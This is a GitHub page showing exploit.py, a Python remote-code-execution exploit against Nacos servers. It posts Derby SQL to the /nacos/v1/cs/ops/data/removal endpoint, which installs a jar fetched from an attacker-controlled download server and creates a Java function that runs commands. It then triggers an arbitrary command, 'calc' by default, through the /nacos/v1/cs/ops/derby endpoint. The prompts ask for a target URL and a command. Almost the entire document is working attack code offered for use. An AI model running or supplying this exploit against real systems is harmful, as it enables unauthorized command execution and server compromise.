-
Notifications
You must be signed in to change notification settings - Fork 238
/
exploit.py
38 lines (32 loc) · 1.96 KB
/
exploit.py
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
import random
import sys
import requests
from urllib.parse import urljoin
import config
# 按装订区域中的绿色按钮以运行脚本。
def exploit(target, command, service):
removal_url = urljoin(target,'/nacos/v1/cs/ops/data/removal')
derby_url = urljoin(target, '/nacos/v1/cs/ops/derby')
for i in range(0,sys.maxsize):
id = ''.join(random.sample('abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ',8))
post_sql = """CALL sqlj.install_jar('{service}', 'NACOS.{id}', 0)\n
CALL SYSCS_UTIL.SYSCS_SET_DATABASE_PROPERTY('derby.database.classpath','NACOS.{id}')\n
CREATE FUNCTION S_EXAMPLE_{id}( PARAM VARCHAR(2000)) RETURNS VARCHAR(2000) PARAMETER STYLE JAVA NO SQL LANGUAGE JAVA EXTERNAL NAME 'test.poc.Example.exec'\n""".format(id=id,service=service);
option_sql = "UPDATE ROLES SET ROLE='1' WHERE ROLE='1' AND ROLE=S_EXAMPLE_{id}('{cmd}')\n".format(id=id,cmd=command);
get_sql = "select * from (select count(*) as b, S_EXAMPLE_{id}('{cmd}') as a from config_info) tmp /*ROWS FETCH NEXT*/".format(id=id,cmd=command);
#get_sql = "select * from users /*ROWS FETCH NEXT*/".format(id=id,cmd=command);
files = {'file': post_sql}
post_resp = requests.post(url=removal_url,files=files)
post_json = post_resp.json()
if post_json.get('message',None) is None and post_json.get('data',None) is not None:
print(post_resp.text)
get_resp = requests.get(url=derby_url,params={'sql':get_sql})
print(get_resp.text)
break
if __name__ == '__main__':
service = 'http://{host}:{port}/download'.format(host=config.server_host,port=config.server_port)
target = 'http://127.0.0.1:8848'
command = 'calc'
target = input('请输入目录URL,默认:http://127.0.0.1:8848:') or target
command = input('请输入命令,默认:calc:') or command
exploit(target=target, command=command,service=service)